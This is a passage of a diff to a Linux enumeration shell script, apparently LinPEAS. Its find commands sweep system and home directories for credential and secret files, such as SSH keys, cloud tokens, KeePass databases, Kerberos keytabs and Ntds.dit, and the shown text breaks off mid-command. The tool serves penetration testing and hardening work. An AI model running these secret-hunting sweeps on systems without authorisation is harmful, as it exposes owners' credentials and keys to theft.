OVPN_RELEVANT_NAMES="*.ovpn" - SSH_RELEVANT_NAMES="id_dsa* id_rsa* known_hosts authorized_hosts authorized_keys *.pem *.cer *.crt *.csr *.der *.pfx *.p12 agent* config vault-ssh-helper.hcl .vault-token" - CLOUD_KEYS_RELEVANT_NAMES="credentials credentials.db legacy_credentials.db access_tokens.db accessTokens.json azureProfile.json cloud.cfg" - KERBEROS_RELEVANT_NAMES="krb5.conf krb5.keytab .k5login kadm5.acl" - KIBANA_RELEVANT_NAMES="kibana.y*ml" - KNOCK_RELEVANT_NAMES="knockd" - LOGSTASH_RELEVANT_NAMES="logstash" - ELASTICSEARCH_RELEVANT_NAMES="elasticsearch.y*ml" - COUCHDB_RELEVANT_NAMES="couchdb" - REDIS_RELEVANT_NAMES="redis.conf" - MOSQUITTO_RELEVANT_NAMES="mosquitto.conf" - NEO4J_RELEVANT_NAMES="neo4j" - ERLANG_RELEVANT_NAMES=".erlang.cookie" - GVM_RELEVANT_NAMES="gvm-tools.conf" - IPSEC_RELEVANT_NAMES="ipsec.secrets ipsec.conf" - IRSSI_RELEVANT_NAMES=".irssi" - KEYRING_RELEVANT_NAMES="keyrings *.keyring *.keystore" - FILEZILLA_RELEVANT_NAMES="filezilla" - BACKUPMANAGER_RELEVANT_NAMES="storage.php database.php" - PASSWD_SPLUNK_RELEVANT_NAMES="passwd" - GITLAB_RELEVANT_NAMES="secrets.yml gitlab.yml gitlab.rb" - PGP_RELEVANT_NAMES="*.pgp *.gpg .gnupg" - VIM_RELEVANT_NAMES=".*.swp .viminfo" - DOCKER_RELEVANT_NAMES="docker.sock docker.socket Dockerfile docker-compose.yml" - FIREFOX_RELEVANT_NAMES=".mozilla" - CHROME_RELEVANT_NAMES="google-chrome" - AUTOLOGIN_RELEVANT_NAMES="autologin autologin.conf" - FASTCGI_RELEVANT_NAMES="fastcgi_params" - SNMP_RELEVANT_NAMES="snmpd.conf" - - DB_RELEVANT_NAMES="*.db *.sqlite *.sqlite3 *.sql" - INSTERESTING_RELEVANT_NAMES=".msmtprc .env .google_authenticator *_history .recently-used.xbel .lesshst .sudo_as_admin_successful .profile *bashrc *httpd.conf *.plan .htpasswd .gitconfig .git-credentials .git .svn *.rhost hosts.equiv .ldaprc" - PASSWORD_RELEVANT_NAMES="*password* *credential* creds*" - BACKUPS_DIRS_RELEVANT_NAMES="backup backups" + printf $GREEN"Caching directories "$NC - FIND_SYSTEMD_RELEVANT_NAMES=$(prep_to_find "$SYSTEMD_RELEVANT_NAMES") - FIND_TIMERS_RELEVANT_NAMES=$(prep_to_find "$TIMERS_RELEVANT_NAMES") - FIND_SOCKETS_RELEVANT_NAMES=$(prep_to_find "$SOCKETS_RELEVANT_NAMES") - FIND_DBUS_RELEVANT_NAMES=$(prep_to_find "$DBUS_RELEVANT_NAMES") - - FIND_MYSQL_RELEVANT_NAMES=$(prep_to_find "$MYSQL_RELEVANT_NAMES") - FIND_POSTGRESQL_RELEVANT_NAMES=$(prep_to_find "$POSTGRESQL_RELEVANT_NAMES") - FIND_APACHE_RELEVANT_NAMES=$(prep_to_find "$APACHE_RELEVANT_NAMES") - FIND_PHP_RELEVANT_NAMES=$(prep_to_find "$PHP_RELEVANT_NAMES") - FIND_WORDPRESS_RELEVANT_NAMES=$(prep_to_find "$WORDPRESS_RELEVANT_NAMES") - FIND_DRUPAL_RELEVANT_NAMES=$(prep_to_find "$DRUPAL_RELEVANT_NAMES") - FIND_MOODLE_RELEVANT_NAMES=$(prep_to_find "$MOODLE_RELEVANT_NAMES") - FIND_TOMCAT_RELEVANT_NAMES=$(prep_to_find "$TOMCAT_RELEVANT_NAMES") - FIND_MONGO_RELEVANT_NAMES=$(prep_to_find "$MONGO_RELEVANT_NAMES") - FIND_SUPERVISORD_RELEVANT_NAMES=$(prep_to_find "$SUPERVISORD_RELEVANT_NAMES") - FIND_CESI_RELEVANT_NAMES=$(prep_to_find "$CESI_RELEVANT_NAMES") - FIND_RSYNCD_RELEVANT_NAMES=$(prep_to_find "$RSYNCD_RELEVANT_NAMES") - FIND_HOSTAPAD_RELEVANT_NAMES=$(prep_to_find "$HOSTAPAD_RELEVANT_NAMES") - FIND_ANACONDA_KS_RELEVANT_NAMES=$(prep_to_find "$ANACONDA_KS_RELEVANT_NAMES") - FIND_VNC_RELEVANT_NAMES=$(prep_to_find "$VNC_RELEVANT_NAMES") - FIND_LDAP_RELEVANT_NAMES=$(prep_to_find "$LDAP_RELEVANT_NAMES") - FIND_OVPN_RELEVANT_NAMES=$(prep_to_find "$OVPN_RELEVANT_NAMES") - FIND_SSH_RELEVANT_NAMES=$(prep_to_find "$SSH_RELEVANT_NAMES") - FIND_CLOUD_KEYS_RELEVANT_NAMES=$(prep_to_find "$CLOUD_KEYS_RELEVANT_NAMES") - FIND_KERBEROS_RELEVANT_NAMES=$(prep_to_find "$KERBEROS_RELEVANT_NAMES") - FIND_KIBANA_RELEVANT_NAMES=$(prep_to_find "$KIBANA_RELEVANT_NAMES") - FIND_KNOCK_RELEVANT_NAMES=$(prep_to_find "$sK_RELEVANT_NAMES") - FIND_LOGSTASH_RELEVANT_NAMES=$(prep_to_find "$LOGSTASH_RELEVANT_NAMES") - FIND_ELASTICSEARCH_RELEVANT_NAMES=$(prep_to_find "$ELASTICSEARCH_RELEVANT_NAMES") - FIND_COUCHDB_RELEVANT_NAMES=$(prep_to_find "$COUCHDB_RELEVANT_NAMES") - FIND_REDIS_RELEVANT_NAMES=$(prep_to_find "$REDIS_RELEVANT_NAMES") - FIND_MOSQUITTO_RELEVANT_NAMES=$(prep_to_find "$MOSQUITTO_RELEVANT_NAMES") - FIND_NEO4J_RELEVANT_NAMES=$(prep_to_find "$NEO4J_RELEVANT_NAMES") - FIND_ERLANG_RELEVANT_NAMES=$(prep_to_find "$ERLANG_RELEVANT_NAMES") - FIND_GVM_RELEVANT_NAMES=$(prep_to_find "$GVM_RELEVANT_NAMES") - FIND_IPSEC_RELEVANT_NAMES=$(prep_to_find "$IPSEC_RELEVANT_NAMES") - FIND_IRSSI_RELEVANT_NAMES=$(prep_to_find "$IRSSI_RELEVANT_NAMES") - FIND_KEYRING_RELEVANT_NAMES=$(prep_to_find "$KEYRING_RELEVANT_NAMES") - FIND_FILEZILLA_RELEVANT_NAMES=$(prep_to_find "$FILEZILLA_RELEVANT_NAMES") - FIND_BACKUPMANAGER_RELEVANT_NAMES=$(prep_to_find "$BACKUPMANAGER_RELEVANT_NAMES") - FIND_PASSWD_SPLUNK_RELEVANT_NAMES=$(prep_to_find "$PASSWD_SPLUNK_RELEVANT_NAMES") - FIND_GITLAB_RELEVANT_NAMES=$(prep_to_find "$GITLAB_RELEVANT_NAMES") - FIND_PGP_RELEVANT_NAMES=$(prep_to_find "$PGP_RELEVANT_NAMES") - FIND_VIM_RELEVANT_NAMES=$(prep_to_find "$VIM_RELEVANT_NAMES") - FIND_DOCKER_RELEVANT_NAMES=$(prep_to_find "$DOCKER_RELEVANT_NAMES") - FIND_FIREFOX_RELEVANT_NAMES=$(prep_to_find "$FIREFOX_RELEVANT_NAMES") - FIND_CHROME_RELEVANT_NAMES=$(prep_to_find "$CHROME_RELEVANT_NAMES") - FIND_AUTOLOGIN_RELEVANT_NAMES=$(prep_to_find "$AUTOLOGIN_RELEVANT_NAMES") - FIND_FASTCGI_RELEVANT_NAMES=$(prep_to_find "$FASTCGI_RELEVANT_NAMES") - FIND_SNMP_RELEVANT_NAMES=$(prep_to_find "$SNMP_RELEVANT_NAMES") - - FIND_DB_RELEVANT_NAMES=$(prep_to_find "$DB_RELEVANT_NAMES") - FIND_INSTERESTING_RELEVANT_NAMES=$(prep_to_find "$INSTERESTING_RELEVANT_NAMES") - FIND_PASSWORD_RELEVANT_NAMES=$(prep_to_find "$PASSWORD_RELEVANT_NAMES") - FIND_BACKUPS_DIRS_RELEVANT_NAMES=$(prep_to_find "$BACKUPS_DIRS_RELEVANT_NAMES") - - #Get home + #Get home HOMESEARCH="/home/ /Users/ /root/ `cat /etc/passwd 2>/dev/null | grep "sh$" | cut -d ":" -f 6 | grep -Ev "^/root|^/home|^/Users" | tr "\n" " "`" if [ ! "`echo \"$HOMESEARCH\" | grep \"$HOME\"`" ] && [ ! "`echo \"$HOMESEARCH\" | grep -E \"^/root|^/home|^/Users\"`" ]; then #If not listed and not in /home, /Users/ or /root, add current home folder HOMESEARCH="$HOME $HOMESEARCH" fi + GREPHOMESEARCH=`echo "$HOMESEARCH" | sed 's/ *$//g' | tr " " "|"` #Remove ending spaces before putting "|" - # Directories CONT_THREADS=0 - FIND_DIR_VAR=`eval_bckgrd "find /var -type d $FIND_BACKUPS_DIRS_RELEVANT_NAMES -o $FIND_FILEZILLA_RELEVANT_NAMES -o $FIND_MYSQL_RELEVANT_NAMES -o $FIND_APACHE_RELEVANT_NAMES -o $FIND_LDAP_RELEVANT_NAMES -o $FIND_KERBEROS_RELEVANT_NAMES -o $FIND_LOGSTASH_RELEVANT_NAMES -o $FIND_COUCHDB_RELEVANT_NAMES -o $FIND_NEO4J_RELEVANT_NAMES -o $FIND_INSTERESTING_RELEVANT_NAMES -o $FIND_IRSSI_RELEVANT_NAMES -o $FIND_KEYRING_RELEVANT_NAMES 2>/dev/null | sort; printf \\\$Y'. '\\\$NC 1>&2;"` - FIND_DIR_ETC=`eval_bckgrd "find /etc -type d $FIND_BACKUPS_DIRS_RELEVANT_NAMES -o $FIND_FILEZILLA_RELEVANT_NAMES -o $FIND_MYSQL_RELEVANT_NAMES -o $FIND_APACHE_RELEVANT_NAMES -o $FIND_LDAP_RELEVANT_NAMES -o $FIND_KERBEROS_RELEVANT_NAMES -o $FIND_LOGSTASH_RELEVANT_NAMES -o $FIND_COUCHDB_RELEVANT_NAMES -o $FIND_NEO4J_RELEVANT_NAMES -o $FIND_INSTERESTING_RELEVANT_NAMES -o $FIND_DBUS_RELEVANT_NAMES -o $FIND_IRSSI_RELEVANT_NAMES -o $FIND_KEYRING_RELEVANT_NAMES 2>/dev/null | sort; printf \\\$Y'. '\\\$NC 1>&2;"` - FIND_DIR_HOME=`eval_bckgrd "find $HOMESEARCH -type d $FIND_CHROME_RELEVANT_NAMES -o $FIND_FIREFOX_RELEVANT_NAMES -o $FIND_BACKUPS_DIRS_RELEVANT_NAMES -o $FIND_FILEZILLA_RELEVANT_NAMES -o $FIND_APACHE_RELEVANT_NAMES -o $FIND_VNC_RELEVANT_NAMES -o $FIND_LDAP_RELEVANT_NAMES -o $FIND_KERBEROS_RELEVANT_NAMES -o $FIND_LOGSTASH_RELEVANT_NAMES -o $FIND_COUCHDB_RELEVANT_NAMES -o $FIND_NEO4J_RELEVANT_NAMES -o $FIND_INSTERESTING_RELEVANT_NAMES -o $FIND_IRSSI_RELEVANT_NAMES -o $FIND_KEYRING_RELEVANT_NAMES 2>/dev/null | sort; printf \\\$Y'. '\\\$NC 1>&2;"` - FIND_DIR_TMP=`eval_bckgrd "find /tmp -type d $FIND_BACKUPS_DIRS_RELEVANT_NAMES -o $FIND_APACHE_RELEVANT_NAMES -o $FIND_LDAP_RELEVANT_NAMES -o $FIND_KERBEROS_RELEVANT_NAMES -o $FIND_LOGSTASH_RELEVANT_NAMES -o $FIND_COUCHDB_RELEVANT_NAMES -o $FIND_NEO4J_RELEVANT_NAMES -o $FIND_INSTERESTING_RELEVANT_NAMES -o $FIND_KEYRING_RELEVANT_NAMES 2>/dev/null | sort; printf \\\$Y'. '\\\$NC 1>&2;"` - FIND_DIR_USR=`eval_bckgrd "find /usr -type d $FIND_BACKUPS_DIRS_RELEVANT_NAMES -o $FIND_MYSQL_RELEVANT_NAMES -o $FIND_APACHE_RELEVANT_NAMES -o $FIND_LDAP_RELEVANT_NAMES -o $FIND_KERBEROS_RELEVANT_NAMES -o $FIND_LOGSTASH_RELEVANT_NAMES -o $FIND_COUCHDB_RELEVANT_NAMES -o $FIND_NEO4J_RELEVANT_NAMES -o $FIND_INSTERESTING_RELEVANT_NAMES -o $FIND_IRSSI_RELEVANT_NAMES -o $FIND_KEYRING_RELEVANT_NAMES 2>/dev/null | sort; printf \\\$Y'. '\\\$NC 1>&2;"` - FIND_DIR_OPT=`eval_bckgrd "find /opt -type d $FIND_BACKUPS_DIRS_RELEVANT_NAMES -o $FIND_FILEZILLA_RELEVANT_NAMES -o $FIND_APACHE_RELEVANT_NAMES -o $FIND_LDAP_RELEVANT_NAMES -o $FIND_KERBEROS_RELEVANT_NAMES -o $FIND_LOGSTASH_RELEVANT_NAMES -o $FIND_COUCHDB_RELEVANT_NAMES -o $FIND_NEO4J_RELEVANT_NAMES -o $FIND_INSTERESTING_RELEVANT_NAMES -o $FIND_IRSSI_RELEVANT_NAMES -o $FIND_KEYRING_RELEVANT_NAMES 2>/dev/null | sort; printf \\\$Y'. '\\\$NC 1>&2;"` - FIND_DIR_MNT=`eval_bckgrd "find /mnt -type d $FIND_MYSQL_RELEVANT_NAMES -o $FIND_CHROME_RELEVANT_NAMES -o $FIND_FIREFOX_RELEVANT_NAMES -o $FIND_BACKUPS_DIRS_RELEVANT_NAMES -o $FIND_FILEZILLA_RELEVANT_NAMES -o $FIND_APACHE_RELEVANT_NAMES -o $FIND_VNC_RELEVANT_NAMES -o $FIND_LDAP_RELEVANT_NAMES -o $FIND_KERBEROS_RELEVANT_NAMES -o $FIND_LOGSTASH_RELEVANT_NAMES -o $FIND_COUCHDB_RELEVANT_NAMES -o $FIND_NEO4J_RELEVANT_NAMES -o $FIND_INSTERESTING_RELEVANT_NAMES -o $FIND_IRSSI_RELEVANT_NAMES -o $FIND_KEYRING_RELEVANT_NAMES 2>/dev/null | sort; printf \\\$Y'. '\\\$NC 1>&2;"` + # FIND ALL KNOWN INTERESTING SOFTWARE FILES + FIND_DIR_APPLICATIONS=`eval_bckgrd "find /applications -type d -name \"seeddms*\" -o -name \".irssi\" -o -name \"logstash\" -o -name \"filelliza\" -o -name \".svn\" -o -name \"bind\" -o -name \".cloudflared\" -o -name \"couchdb\" -o -name \".vnc\" -o -name \"sites-enabled\" -o -name \"neo4j\" -o -name \"ldap\" -o -name \"keyrings\" -o -name \"mysql\" -o -name \".bluemix\" 2>/dev/null | sort; printf \\\$YELLOW'. '\\\$NC 1>&2;"` + FIND_DIR_BIN=`eval_bckgrd "find /bin -type d -name \"seeddms*\" -o -name \".irssi\" -o -name \"logstash\" -o -name \"filelliza\" -o -name \".svn\" -o -name \"bind\" -o -name \".cloudflared\" -o -name \"couchdb\" -o -name \".vnc\" -o -name \"sites-enabled\" -o -name \"neo4j\" -o -name \"ldap\" -o -name \"keyrings\" -o -name \"mysql\" -o -name \".bluemix\" 2>/dev/null | sort; printf \\\$YELLOW'. '\\\$NC 1>&2;"` + FIND_DIR_CACHE=`eval_bckgrd "find /.cache -type d -name \"seeddms*\" -o -name \".irssi\" -o -name \"logstash\" -o -name \"filelliza\" -o -name \".svn\" -o -name \"bind\" -o -name \".cloudflared\" -o -name \"couchdb\" -o -name \".vnc\" -o -name \"sites-enabled\" -o -name \"neo4j\" -o -name \"ldap\" -o -name \"keyrings\" -o -name \"mysql\" -o -name \".bluemix\" 2>/dev/null | sort; printf \\\$YELLOW'. '\\\$NC 1>&2;"` + FIND_DIR_CDROM=`eval_bckgrd "find /cdrom -type d -name \"seeddms*\" -o -name \".irssi\" -o -name \"logstash\" -o -name \"filelliza\" -o -name \".svn\" -o -name \"bind\" -o -name \".cloudflared\" -o -name \"couchdb\" -o -name \".vnc\" -o -name \"sites-enabled\" -o -name \"neo4j\" -o -name \"ldap\" -o -name \"keyrings\" -o -name \"mysql\" -o -name \".bluemix\" 2>/dev/null | sort; printf \\\$YELLOW'. '\\\$NC 1>&2;"` + FIND_DIR_ETC=`eval_bckgrd "find /etc -type d -name \"seeddms*\" -o -name \".irssi\" -o -name \"logstash\" -o -name \"filelliza\" -o -name \".svn\" -o -name \"bind\" -o -name \".cloudflared\" -o -name \"couchdb\" -o -name \".vnc\" -o -name \"sites-enabled\" -o -name \"neo4j\" -o -name \"ldap\" -o -name \"keyrings\" -o -name \"mysql\" -o -name \"system.d\" -o -name \".bluemix\" 2>/dev/null | sort; printf \\\$YELLOW'. '\\\$NC 1>&2;"` + FIND_DIR_HOMESEARCH=`eval_bckgrd "find $HOMESEARCH -type d -name \"seeddms*\" -o -name \".irssi\" -o -name \"logstash\" -o -name \"filelliza\" -o -name \".svn\" -o -name \"bind\" -o -name \".cloudflared\" -o -name \"couchdb\" -o -name \".vnc\" -o -name \"sites-enabled\" -o -name \"neo4j\" -o -name \"ldap\" -o -name \"keyrings\" -o -name \"mysql\" -o -name \".bluemix\" -o -name \".mozilla\" 2>/dev/null | sort; printf \\\$YELLOW'. '\\\$NC 1>&2;"` + FIND_DIR_MEDIA=`eval_bckgrd "find /media -type d -name \"seeddms*\" -o -name \".irssi\" -o -name \"logstash\" -o -name \"filelliza\" -o -name \".svn\" -o -name \"bind\" -o -name \".cloudflared\" -o -name \"couchdb\" -o -name \".vnc\" -o -name \"sites-enabled\" -o -name \"neo4j\" -o -name \"ldap\" -o -name \"keyrings\" -o -name \"mysql\" -o -name \".bluemix\" 2>/dev/null | sort; printf \\\$YELLOW'. '\\\$NC 1>&2;"` + FIND_DIR_MNT=`eval_bckgrd "find /mnt -type d -name \"seeddms*\" -o -name \".irssi\" -o -name \"logstash\" -o -name \"filelliza\" -o -name \".svn\" -o -name \"bind\" -o -name \".cloudflared\" -o -name \"couchdb\" -o -name \".vnc\" -o -name \"sites-enabled\" -o -name \"neo4j\" -o -name \"ldap\" -o -name \"keyrings\" -o -name \"mysql\" -o -name \".bluemix\" 2>/dev/null | sort; printf \\\$YELLOW'. '\\\$NC 1>&2;"` + FIND_DIR_OPT=`eval_bckgrd "find /opt -type d -name \"seeddms*\" -o -name \".irssi\" -o -name \"logstash\" -o -name \"filelliza\" -o -name \".svn\" -o -name \"bind\" -o -name \".cloudflared\" -o -name \"couchdb\" -o -name \".vnc\" -o -name \"sites-enabled\" -o -name \"neo4j\" -o -name \"ldap\" -o -name \"keyrings\" -o -name \"mysql\" -o -name \".bluemix\" 2>/dev/null | sort; printf \\\$YELLOW'. '\\\$NC 1>&2;"` + FIND_DIR_PRIVATE=`eval_bckgrd "find /private -type d -name \"seeddms*\" -o -name \".irssi\" -o -name \"logstash\" -o -name \"filelliza\" -o -name \".svn\" -o -name \"bind\" -o -name \".cloudflared\" -o -name \"couchdb\" -o -name \".vnc\" -o -name \"sites-enabled\" -o -name \"neo4j\" -o -name \"ldap\" -o -name \"keyrings\" -o -name \"mysql\" -o -name \".bluemix\" 2>/dev/null | sort; printf \\\$YELLOW'. '\\\$NC 1>&2;"` + FIND_DIR_SBIN=`eval_bckgrd "find /sbin -type d -name \"seeddms*\" -o -name \".irssi\" -o -name \"logstash\" -o -name \"filelliza\" -o -name \".svn\" -o -name \"bind\" -o -name \".cloudflared\" -o -name \"couchdb\" -o -name \".vnc\" -o -name \"sites-enabled\" -o -name \"neo4j\" -o -name \"ldap\" -o -name \"keyrings\" -o -name \"mysql\" -o -name \".bluemix\" 2>/dev/null | sort; printf \\\$YELLOW'. '\\\$NC 1>&2;"` + FIND_DIR_SNAP=`eval_bckgrd "find /snap -type d -name \"seeddms*\" -o -name \".irssi\" -o -name \"logstash\" -o -name \"filelliza\" -o -name \".svn\" -o -name \"bind\" -o -name \".cloudflared\" -o -name \"couchdb\" -o -name \".vnc\" -o -name \"sites-enabled\" -o -name \"neo4j\" -o -name \"ldap\" -o -name \"keyrings\" -o -name \"mysql\" -o -name \".bluemix\" 2>/dev/null | sort; printf \\\$YELLOW'. '\\\$NC 1>&2;"` + FIND_DIR_SRV=`eval_bckgrd "find /srv -type d -name \"seeddms*\" -o -name \".irssi\" -o -name \"logstash\" -o -name \"filelliza\" -o -name \".svn\" -o -name \"bind\" -o -name \".cloudflared\" -o -name \"couchdb\" -o -name \".vnc\" -o -name \"sites-enabled\" -o -name \"neo4j\" -o -name \"ldap\" -o -name \"keyrings\" -o -name \"mysql\" -o -name \".bluemix\" 2>/dev/null | sort; printf \\\$YELLOW'. '\\\$NC 1>&2;"` + FIND_DIR_TMP=`eval_bckgrd "find /tmp -type d -name \"seeddms*\" -o -name \".irssi\" -o -name \"logstash\" -o -name \"filelliza\" -o -name \".svn\" -o -name \"bind\" -o -name \".cloudflared\" -o -name \"couchdb\" -o -name \".vnc\" -o -name \"sites-enabled\" -o -name \"neo4j\" -o -name \"ldap\" -o -name \"keyrings\" -o -name \"mysql\" -o -name \".bluemix\" 2>/dev/null | sort; printf \\\$YELLOW'. '\\\$NC 1>&2;"` + FIND_DIR_USR=`eval_bckgrd "find /usr -type d -name \"seeddms*\" -o -name \".irssi\" -o -name \"logstash\" -o -name \"filelliza\" -o -name \".svn\" -o -name \"bind\" -o -name \".cloudflared\" -o -name \"couchdb\" -o -name \".vnc\" -o -name \"sites-enabled\" -o -name \"neo4j\" -o -name \"ldap\" -o -name \"keyrings\" -o -name \"mysql\" -o -name \".bluemix\" 2>/dev/null | sort; printf \\\$YELLOW'. '\\\$NC 1>&2;"` + FIND_DIR_VAR=`eval_bckgrd "find /var -type d -name \"seeddms*\" -o -name \".irssi\" -o -name \"logstash\" -o -name \"filelliza\" -o -name \".svn\" -o -name \"bind\" -o -name \".cloudflared\" -o -name \"couchdb\" -o -name \".vnc\" -o -name \"sites-enabled\" -o -name \"neo4j\" -o -name \"ldap\" -o -name \"keyrings\" -o -name \"mysql\" -o -name \".bluemix\" 2>/dev/null | sort; printf \\\$YELLOW'. '\\\$NC 1>&2;"` + FIND_APPLICATIONS=`eval_bckgrd "find /applications -name \"unattended.xml\" -o -name \"ipsec.secrets\" -o -name \"gitlab.rm\" -o -name \"SAM\" -o -name \"passwd\" -o -name \"docker.sock\" -o -name \"security\" -o -name \"*.sqlite\" -o -name \"gvm-tools.conf\" -o -name \"*vnc*.txt\" -o -name \"unattend.inf\" -o -name \"security.sav\" -o -name \"*.kdbx\" -o -name \"config.php\" -o -name \"KeePass.config*\" -o -name \"SYSTEM\" -o -name \"*.cer\" -o -name \".git\" -o -name \"anaconda-ks.cfg\" -o -name \"sitemanager.xml\" -o -name \"*.gpg\" -o -name \"access_tokens.json\" -o -name \"*.db\" -o -name \"id_rsa*\" -o -name \"*.keystore\" -o -name \"postgresql.conf\" -o -name \"id_dsa*\" -o -name \"*.gnupg\" -o -name \"db.php\" -o -name \"tomcat-users.xml\" -o -name \"*.pgp\" -o -name \"access_tokens.db\" -o -name \"pagefile.sys\" -o -name \"credentials.db\" -o -name \"rsyncd.conf\" -o -name \"fastcgi_params\" -o -name \"https.conf\" -o -name \"*.sqlite3\" -o -name \"wp-config.php\" -o -name \"default.sav\" -o -name \"*.jks\" -o -name \".rhosts\" -o -name \"*vnc*.c*nf*\" -o -name \"*.rdg\" -o -name \"datasources.xml\" -o -name \"backups\" -o -name \"Dockerfile\" -o -name \"krb5.conf\" -o -name \"000-default\" -o -name \"filezilla.xml\" -o -name \"setupinfo\" -o -name \"*vnc*.ini\" -o -name \"web*.config\" -o -name \".lesshst\" -o -name \".sudo_as_admin_successful\" -o -name \"Ntds.dit\" -o -name \"mongod*.conf\" -o -name \"*.timer\" -o -name \"vault-ssh-helper.hcl\" -o -name \"*vnc*.xml\" -o -name \".*_history\" -o -name \".pypirc\" -o -name \"my.cnf\" -o -name \"*.swp\" -o -name \"unattend.txt\" -o -name \"php.ini\" -o -name \".gitconfig\" -o -name \"autologin\" -o -name \"ws_ftp.ini\" -o -name \"recentservers.xml\" -o -name \"*.socket\" -o -name \"scclient.exe\" -o -name \"TokenCache.dat\" -o -name \"storage.php\" -o -name \"*credential*\" -o -name \"AppEvent.Evt\" -o -name \".msmtprc\" -o -name \"iis6.log\" -o -name \"secrets.yml\" -o -name \"system.sav\" -o -name \"software\" -o -name \"unattend.xml\" -o -name \"FreeSSHDservice.ini\" -o -name \"rsyncd.secrets\" -o -name \"RDCMan.settings\" -o -name \"software.sav\" -o -name \"kadm5.acl\" -o -name \"credentials\" -o -name \"wcx_ftp.ini\" -o -name \"ConsoleHost_history.txt\" -o -name \"*.pem\" -o -name \"sysprep.xml\" -o -name \".bashrc\" -o -name \"*.key\" -o -name \"*.ovpn\" -o -name \"authorized_keys\" -o -name \"sites.ini\" -o -name \"docker.socket\" -o -name \"bash.exe\" -o -name \"NetSetup.log\" -o -name \"cloud.cfg\" -o -name \"mosquitto.conf\" -o -name \"KeePass.ini\" -o -name \"ftp.ini\" -o -name \".plan\" -o -name \"wsl.exe\" -o -name \"accessTokens.json\" -o -name \"appcmd.exe\" -o -name \"ftp.config\" -o -name \"printers.xml\" -o -name \"pgsql.conf\" -o -name \"autologin.conf\" -o -name \".htpasswd\" -o -name \"*.viminfo\" -o -name \"settings.php\" -o -name \"database.php\" -o -name \"my.ini\" -o -name \"SecEvent.Evt\" -o -name \"sysprep.inf\" -o -name \".k5login\" -o -name \"*.ftpconfig\" -o -name \"pg_hba.conf\" -o -name \"krb5.keytab\" -o -name \"AzureRMContext.json\" -o -name \"https-xampp.conf\" -o -name \"hosts.equiv\" -o -name \"server.xml\" -o -name \"elasticsearch.y*ml\" -o -name \"services.xml\" -o -name \"*.service\" -o -name \"azureProfile.json\" -o -name \".git-credentials\" -o -name \"*config*.php\" -o -name \"*.p12\" -o -name \".recently-used.xbel\" -o -name \".erlang.cookie\" -o -name \"authorized_hosts\" -o -name \"pgadmin*.db\" -o -name \"error.log\" -o -name \"ntuser.dat\" -o -name \"cesi.conf\" -o -name \"gitlab.yml\" -o -name \"supervisord.conf\" -o -name \"*.der\" -o -name \"redis.conf\" -o -name \"access.log\" -o -name \"snmpd.conf\" -o -name \"backup\" -o -name \"ddclient.conf\" -o -name \"docker-compose.yml\" -o -name \"scheduledtasks.xml\" -o -name \"winscp.ini\" -o -name \"*.pfx\" -o -name \"kibana.y*ml\" -o -name \"hostapd.conf\" -o -name \".google_authenticator\" -o -name \"index.dat\" -o -name \"creds*\" -o -name \"*password*\" -o -name \".env\" -o -name \".profile\" -o -name \".vault-token\" -o -name \".ldaprc\" -o -name \"groups.xml\" -o -name \"legacy_credentials.db\" -o -name \"*.crt\" -o -name \"drives.xml\" -o -name \"httpd.conf\" -o -name \".github\" -o -name \"KeePass.enforced*\" -o -name \"*.csr\" -o -name \"known_hosts\" -o -name \"setupinfo.bak\" -o -name \"*.keyring\" -o -name \"ipsec.conf\" -o -name \"ffftp.ini\" 2>/dev/null | sort; printf \\\$YELLOW'. '\\\$NC 1>&2;"` + FIND_BIN=`eval_bckgrd "find /bin -name \"unattended.xml\" -o -name \"ipsec.secrets\" -o -name \"gitlab.rm\" -o -name \"SAM\" -o -name \"passwd\" -o -name \"docker.sock\" -o -name \"security\" -o -name \"*.sqlite\" -o -name \"gvm-tools.conf\" -o -name \"*vnc*.txt\" -o -name \"unattend.inf\" -o -name \"security.sav\" -o -name \"*.kdbx\" -o -name \"config.php\" -o -name \"KeePass.config*\" -o -name \"SYSTEM\" -o -name \"*.cer\" -o -name \".git\" -o -name \"anaconda-ks.cfg\" -o -name \"sitemanager.xml\" -o -name \"*.gpg\" -o -name \"access_tokens.json\" -o -name \"*.db\" -o -name \"id_rsa*\" -o -name \"*.keystore\" -o -name \"postgresql.conf\" -o -name \"id_dsa*\" -o -name \"*.gnupg\" -o -name \"db.php\" -o -name \"tomcat-users.xml\" -o -name \"*.pgp\" -o -name \"access_tokens.db\" -o -name \"pagefile.sys\" -o -name \"credentials.db\" -o -name \"rsyncd.conf\" -o -name \"fastcgi_params\" -o -name \"https.conf\" -o -name \"*.sqlite3\" -o -name \"wp-config.php\" -o -name \"default.sav\" -o -name \"*.jks\" -o -name \".rhosts\" -o -name \"*vnc*.c*nf*\" -o -name \"*.rdg\" -o -name \"datasources.xml\" -o -name \"backups\" -o -name \"Dockerfile\" -o -name \"krb5.conf\" -o -name \"000-default\" -o -name \"filezilla.xml\" -o -name \"setupinfo\" -o -name \"*vnc*.ini\" -o -name \"web*.config\" -o -name \".lesshst\" -o -name \".sudo_as_admin_successful\" -o -name \"Ntds.dit\" -o -name \"mongod*.conf\" -o -name \"*.timer\" -o -name \"vault-ssh-helper.hcl\" -o -name \"*vnc*.xml\" -o -name \".*_history\" -o -name \".pypirc\" -o -name \"my.cnf\" -o -name \"*.swp\" -o -name \"unattend.txt\" -o -name \"php.ini\" -o -name \".gitconfig\" -o -name \"autologin\" -o -name \"ws_ftp.ini\" -o -name \"recentservers.xml\" -o -name \"*.socket\" -o -name \"scclient.exe\" -o -name \"TokenCache.dat\" -o -name \"storage.php\" -o -name \"*credential*\" -o -name \"AppEvent.Evt\" -o -name \".msmtprc\" -o -name \"iis6.log\" -o -name \"secrets.yml\" -o -name \"system.sav\" -o -name \"software\" -o -name \"unattend.xml\" -o -name \"FreeSSHDservice.ini\" -o -name \"rsyncd.secrets\" -o -name \"RDCMan.settings\" -o -name \"software.sav\" -o -name \"kadm5.acl\" -o -name \"credentials\" -o -name \"wcx_ftp.ini\" -o -name \"ConsoleHost_history.txt\" -o -name \"*.pem\" -o -name \"sysprep.xml\" -o -name \".bashrc\" -o -name \"*.key\" -o -name \"*.ovpn\" -o -name \"authorized_keys\" -o -name \"sites.ini\" -o -name \"docker.socket\" -o -name \"bash.exe\" -o -name \"NetSetup.log\" -o -name \"cloud.cfg\" -o -name \"mosquitto.conf\" -o -name \"KeePass.ini\" -o -name \"ftp.ini\" -o -name \".plan\" -o -name \"wsl.exe\" -o -name \"accessTokens.json\" -o -name \"appcmd.exe\" -o -name \"ftp.config\" -o -name \"printers.xml\" -o -name \"pgsql.conf\" -o -name \"autologin.conf\" -o -name \".htpasswd\" -o -name \"*.viminfo\" -o -name \"settings.php\" -o -name \"database.php\" -o -name \"my.ini\" -o -name 